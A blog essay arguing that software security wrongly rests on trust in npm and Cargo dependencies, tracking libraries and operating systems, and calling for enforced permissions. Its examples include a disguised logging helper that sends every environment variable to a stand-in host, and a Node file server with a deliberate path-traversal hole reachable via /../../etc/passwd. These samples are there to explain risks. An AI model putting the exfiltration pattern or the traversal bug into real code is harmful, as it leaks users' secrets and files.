The bad state of application security: trust
--
Ever since I started working with NodeJS and NPM, the feeling of speed, convenience and ease around project dependencies has been shadowed by a question we all eventually face: if it’s so easy to install dependencies, when does this become a liability? Won’t the project turn into a mess of dependencies? That is a development challenge in itself, especially when you want to unplug a dependency or switch to another, but ultimately, won’t it become a security liability?
The same goes for Rust and Cargo: you need WebDAV capabilities in your project? There’s a library for that. You need calendar capabilities? Just install a library. Each library depends, of course, on another set of libraries, and so on. This is great for developers: they stop reimplementing what has already been done, and they get to use libraries without hassle. A simple command takes care of the whole setup. If you don’t appreciate this model, try to code something in C or C++ for a week. You will beg for package and dependency managers.
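To make the convenience concrete, this is roughly all the “setup” there is in either ecosystem (the package and crate names are illustrative, not endorsements):

```sh
# Node: fetches the package plus its entire transitive dependency tree
npm install webdav

# Rust: adds the dependency to Cargo.toml and resolves the whole tree
cargo add ical
```

One command, and dozens of transitive dependencies you will never read are now part of your build.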
But while speed and convenience were solved by tooling, security remained the developer’s concern. The fact that almost all libraries are open source is a pat on the back meant to ease the security anxiety. You can check the code, it’s all good. Nobody would write anything malicious. Everybody is using this library! In reality, nobody checks the code of every project dependency, and the fact that everybody is using a certain library doesn’t mean that anyone has actually reviewed it.
Snyk and npm audit came as a sort of hasty rescue operation, but these tools are superficial. They try to match documented vulnerabilities against existing open source code, usually suggesting an upgrade to a fixed version of the same library, which is not always possible. And sometimes malicious intent cannot be discovered by this kind of matching at all: code that is perfectly valid and non-malicious can be turned into something bad without any notice. The biggest issue, of course, is that these security tools need documented vulnerabilities. If nobody scans for a particular trait, or if the malicious trait is undocumented, it gets lost in the mix of thousands of lines of code.
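To see why matching against a vulnerability database is not enough, here is a hypothetical sketch in Node/TypeScript: a helper any reviewer would skim past, with a made-up “telemetry” endpoint (collector.example and the function itself are inventions for illustration):

```ts
import { hostname } from "node:os";

// Looks like an innocent logging helper buried in a transitive dependency.
export function logError(message: string): void {
  console.error(`[${hostname()}] ${message}`);

  // The ride-along: perfectly valid code that quietly ships your whole
  // environment (tokens, API keys, connection strings) to a third party.
  fetch("https://collector.example/ingest", {
    method: "POST",
    headers: { "content-type": "application/json" },
    body: JSON.stringify({ host: hostname(), env: process.env }),
  }).catch(() => {
    // Fail silently: no error, no log line, nothing for anyone to notice.
  });
}
```

There is no CVE to match here: every line is valid, documented platform behavior, so an audit tool that only compares versions against advisories reports a clean bill of health.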
So you audit your code…
But so far we have only talked about vulnerabilities and code audits. There is another class of security-breaching software: tracking and advertising libraries. The first harm your privacy; the second harm the integrity of the application you are using by injecting random code that comes with the ads. Of course, there may be various checks in place to limit the harm, but in the end the application developers care about the application, not about the ads. The ads are an afterthought, usually dealt with by employing yet another library. Who checks the code of that library? Does anyone even care?
The worst case of tracking I have encountered was at a previous company I worked for, where the latest tracking capabilities of their mobile app were showcased in a meeting. The tracking library would periodically take a screenshot of the phone while the application was in use and send the unedited image back to the company. The presenter was asked in passing about the privacy and legality of this behavior, but he brushed everything off with the usual “everybody does it”. If everybody does it, it must be legal. In reality, they didn’t care about the legality of the situation. They cared about measuring the user’s behavior and correcting anything that didn’t generate more clicks, more interaction, more money.
We can see that even with all the code audits in place, even with tools that trigger alerts when code is found to be sneaky, the ultimate security arbiter we rely on today is woefully inadequate: trust. I trust that you give me a well-behaved library. I trust that by using your application I am not spied on. I trust that by giving you rights to my documents folder, you won’t upload everything I have there to your server.
Scanning for malicious behavior is tough
But it goes deeper, because the problem is not just with project libraries and dependencies. You launch an application on your secure and private Linux machine: can you be sure of its behavior? Even if the application is fully safe and the developer is a vetted, well-respected member of the open source community, are you fully certain that an honest mistake in their code cannot produce a bug that somebody else can exploit to do unknown harm? Again, you trust that it cannot. But let’s go further.
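First, though, consider how small an exploitable honest mistake can be. A minimal Node sketch (the server and paths are hypothetical): a developer who only ever intended to serve files from ./public writes something like this:

```ts
import { createServer } from "node:http";
import { readFile } from "node:fs/promises";
import { join } from "node:path";

createServer(async (req, res) => {
  // Bug: join() resolves "..", so a request for /../../etc/passwd
  // escapes ./public entirely. Nothing here looks malicious, and no
  // vulnerability database will flag it, yet it leaks arbitrary files.
  const filePath = join("public", req.url ?? "/");
  try {
    res.end(await readFile(filePath));
  } catch {
    res.statusCode = 404;
    res.end("not found");
  }
}).listen(8080);
```

The fix is a couple of lines (resolve the path and verify it still starts with the public directory), which is exactly why such bugs slip through review.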
How often do you monitor the connections on your network? How often do you monitor speed alterations in your network traffic? Would you associate them with malicious applications doing covert operations on your network? Would you be able to find the processes that cause the slowdowns? Windows and macOS let you pin network traffic to the apps that cause it with their simple, default, graphical process management tools. On Linux you have to know what to install and how to use it. Do you do this on a regular basis?
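For the record, the Linux incantations exist; you just have to know them:

```sh
# Map open sockets to the processes that own them
ss -tunap

# Per-process bandwidth, the closest thing to the Windows/macOS view
# (usually a separate install):
sudo nethogs

# Everything a single suspicious process has open on the network:
lsof -i -a -p <pid>
```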
No. The answer is no, because you trust the operating system, the software and all of their dependencies to do exactly what they say they do and nothing more. If a small library that nobody thinks about starts sending your documents to an unknown destination, the most probable course of action will be complete ignorance: you won’t even know it is happening. And that is before mentioning that almost all the software development teams I have worked with so far would simply ignore the Snyk audit reports. Nobody cares, because they all want that feature released and that bug fixed. We trust the library developers for the rest.
Denying trust
The only way to mitigate this trust, to move security from a place of trust to a place of enforcement, is to adjust the framework in which you write your software and the operating system you run it on. If we want to stop relying on “security audits” that go nowhere, or give false positives, or give nothing at all because they cannot possibly connect our “well-written” code to a complete and total malicious disaster, we have to enforce security at the programming language level and at the operating system level.
This, again, is not new. Browsers these days set a very high bar when it comes to security. Think about the permission request to use the camera or the microphone. Think about the volume indicator on each browser tab that plays sound. Think about the permission request to download a file into your home directory, the permission request to display notifications, the full transparency of each network connection that you can see in the browser’s developer tools. All of this means the browser does not take the application code for granted: it notifies the user about any resource the code uses.
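The enforcement is baked into the web APIs themselves. A minimal sketch using the real browser calls:

```ts
async function askForEverything(): Promise<void> {
  // The browser, not the application, decides whether this succeeds:
  // the call itself triggers the camera/microphone permission prompt
  // and rejects if the user declines.
  const stream = await navigator.mediaDevices.getUserMedia({ audio: true, video: true });

  // Same model for notifications: an explicit, user-visible request.
  const decision = await Notification.requestPermission();

  console.log(`${stream.getTracks().length} media tracks granted, notifications: ${decision}`);
}
```

There is simply no API path to the microphone that bypasses the prompt; that is what enforcement instead of trust looks like.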
Kind of the same thing happens at the operating system level with certain resources. Mobile applications have to request rights for everything these days. The same goes for Linux when using SELinux and Flatpak applications: they have a fixed set of rights and cannot do anything outside of them. This means security is enforced, not trusted. Then we have modern programming platforms like .NET, which perform countless checks to make sure the code cannot access memory unrelated to the application. This is the only way to make security real, and not a joke between tired and overworked developers.
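You can see the Flatpak side of this on any machine that has it installed (the application ID is just an example):

```sh
# Inspect the fixed set of rights an application ships with
flatpak info --show-permissions org.mozilla.firefox

# Tighten it further: after this, the app simply cannot see your home directory
flatpak override --user --nofilesystem=home org.mozilla.firefox
```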
But even so, with all the checks in place, tracking applications like the one that was shown to me are still possible today. That’s because programming languages usually check only for memory misuse, while operating systems are really old and base their security model on a network run by a system admin, one who sets everything up nice and safe for everybody. Unfortunately, things have changed. End users are now the main consumers of devices and applications, and the system admin is becoming a relic in most startups. Browsers are a bit ahead, but not by much, and again, their novel security solutions are limited to the obvious resources: files, cameras and microphones. Nobody checks for keyloggers, malicious and covert uploads, weird code injections coming from ads, or hidden bitcoin miners.
If we want application security, we should discard trust. We need to rely on the programming language not to allow the developer to do things that are not explicitly declared, and we need to rely on the operating system to at least report all used resources and all network traffic, the same way a browser does today. That’s the bare minimum.
Unfortunately, today we have neither. Programming languages help developers write code faster, with fewer bugs and fewer memory leaks, but they don’t ask what the program does. It could be a perfectly written, bug-free and exceptionally performant keylogger. The programming language couldn’t care less. And the operating system reports network traffic only when asked, or only after installing arcane tools that are hard to master.
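To be fair, the first hints are out there. Deno, for instance (one runtime’s take, not the whole answer), denies every resource by default and makes each capability an explicit, scoped command-line declaration:

```sh
# No flags: the script cannot read files, touch the network or see env vars
deno run script.ts

# Every capability must be declared, and can be narrowed to specific targets
deno run --allow-read=./data --allow-net=api.example.com script.ts
```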
I hope the future will bring better tools and renewed interest in operating system and development platform security. Maybe in a future article we will dig deeper into these subjects and discuss security trends and improvements that could make the end user’s life easier. Thanks for reading and see you next time!